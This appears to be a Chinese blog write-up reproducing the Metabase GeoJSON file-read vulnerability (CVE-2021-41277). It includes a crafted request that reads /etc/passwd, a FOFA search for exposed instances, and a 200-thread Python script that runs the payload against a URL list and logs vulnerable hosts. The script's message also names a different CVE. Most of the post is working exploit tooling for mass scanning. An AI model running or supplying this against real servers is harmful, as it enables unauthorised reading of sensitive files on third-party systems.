Metabase敏感信息泄露漏洞(CVE-2021-41277)

ca5tle

2021-11-24 (Updated: 2021-11-24)

漏洞复现

0x00 前言

metabase 是一个简单、开源的数据分析平台。自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息。

0x01 影响版本

1 2	metabase version < 0.40.5 metabase version >= 1.0.0, < 1.40.5

0x02 环境搭建

1	docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

0x03 漏洞复现

抓包改包

GET /api/geojson?url=file:/etc/passwd HTTP/1.1
Host: 10.108.2.145:3000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=88a28499-7452-4869-bdc9-1c0f69fbf801; _ga=GA1.1.1715384566.1637761316; _gid=GA1.1.1734076727.1637761316
If-Modified-Since: Wed, 24 Nov 2021 13:48:22 GMT
Connection: close

0x04 批量

FOFA查询

1	app="metabase"

# -*- coding: utf-8 -*-
import requests
import threadpool

requests.packages.urllib3.disable_warnings()

def verify(urls):
    url = urls + '/api/geojson?url=file:/etc/passwd'
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
    try:
        res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False)
        if 'root' in res.text:
            info = "[+] 存在CVE-2021-36749漏洞: " + urls
            save_vuln(info)
            print(info)
    except Exception as e:
        # print(e)
        pass


def save_vuln(info):
    vuln = info + '\n'
    with open("vuln.txt", 'a', encoding='utf-8') as ff:
        ff.write(vuln)


def get_file_url():
    with open("url.txt", 'r', encoding='UTF-8') as f:
        _urls = f.readlines()
    urls = [url.strip() for url in _urls if url and url.strip()]
    return urls


if __name__ == "__main__":
    url = get_file_url()
    pool = threadpool.ThreadPool(200)
    res = threadpool.makeRequests(verify, url)
    [pool.putRequest(req) for req in res]
    pool.wait()